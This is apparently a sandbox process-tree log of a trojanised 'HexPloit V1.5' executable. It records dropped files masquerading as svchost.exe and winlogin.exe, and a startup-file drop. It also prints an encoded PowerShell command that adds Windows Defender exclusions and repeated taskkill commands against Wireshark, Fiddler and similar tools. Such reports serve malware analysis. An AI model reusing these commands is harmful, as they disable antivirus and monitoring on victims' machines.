C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:492

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1948

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3284

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\HexPloit Release.rar"
2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1336

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:5560

C:\Users\Admin\Downloads\files\HexPloit Release\HexPloit V1.5.exe
"C:\Users\Admin\Downloads\files\HexPloit Release\HexPloit V1.5.exe"
1⤵
PID:5256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAegB2ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIABBAGcAYQBpAG4AIABJAGYAIABEAG8AdwBuAGwAbwBhAGQAZQByACAARABvAGUAcwBuACcAJwB0ACAAUwB0AGEAcgB0ACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBhAG0AbAAjAD4A"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5288

C:\Users\Admin\AppData\Local\Temp\hexer.exe
"C:\Users\Admin\AppData\Local\Temp\hexer.exe"
2⤵
- Executes dropped EXE
PID:2900

C:\Users\Admin\AppData\Local\Temp\onefile_2900_133641606043572903\hexer.exe
"C:\Users\Admin\AppData\Local\Temp\hexer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tempfolders\winlogin\winlogin.exe"
4⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\tempfolders\winlogin\winlogin.exe
C:\Users\Admin\AppData\Local\Temp\tempfolders\winlogin\winlogin.exe
5⤵
- Executes dropped EXE
PID:4336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAegB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAcQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaAB6ACMAPgA="
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Users\Admin\AppData\Local\Temp\System32.exe
"C:\Users\Admin\AppData\Local\Temp\System32.exe"
6⤵
- Executes dropped EXE
PID:984

C:\Users\Admin\AppData\Local\Temp\onefile_984_133641606128688919\hexer.exe
"C:\Users\Admin\AppData\Local\Temp\System32.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tempfolders\svchost\svchost.exe"
8⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\tempfolders\svchost\svchost.exe
C:\Users\Admin\AppData\Local\Temp\tempfolders\svchost\svchost.exe
9⤵
- Executes dropped EXE
PID:5188

C:\Users\Admin\AppData\Local\Temp\onefile_5188_133641606504508442\svchost.exe
C:\Users\Admin\AppData\Local\Temp\tempfolders\svchost\svchost.exe
10⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
11⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\onefile_5188_133641606504508442\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_5188_133641606504508442\svchost.exe" "--multiprocessing-fork" "parent_pid=2736" "pipe_handle=876"
11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
12⤵
PID:248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:1272

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5220

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5776

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5432

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4888

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3820

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:388

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3800

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5636

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4584

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5344

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4996

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5632

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2028

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5464

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5984

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:952

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:1136

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5956

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5768

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5812

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5532

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3884

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3600

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5464

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3568

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:6084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:5984

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5920

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4976

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4132

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:992

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5972

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4308

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2336

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:2464

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:688

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2412

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4824

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:6080

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2896

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5696

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:8

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:5276

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:3104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2176

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2964

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4372

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5760

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:6108

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5640

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:5852

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3896

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1980

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3304

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4992

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1412

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:404

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5000

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:2984

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4980

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4868

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4960

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:200

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5972

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5724

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5248

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1708

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3400

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2664

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3748

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:3276

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1672

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4540

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2808

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4688

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1508

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Kills process with taskkill
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4124

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:416

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:2604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:4340

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:5900

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5080

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5468

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5548

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:5724

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3300

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:4004

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:3592

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2888

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5756

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5416

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5620

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:3748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:6020

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4476

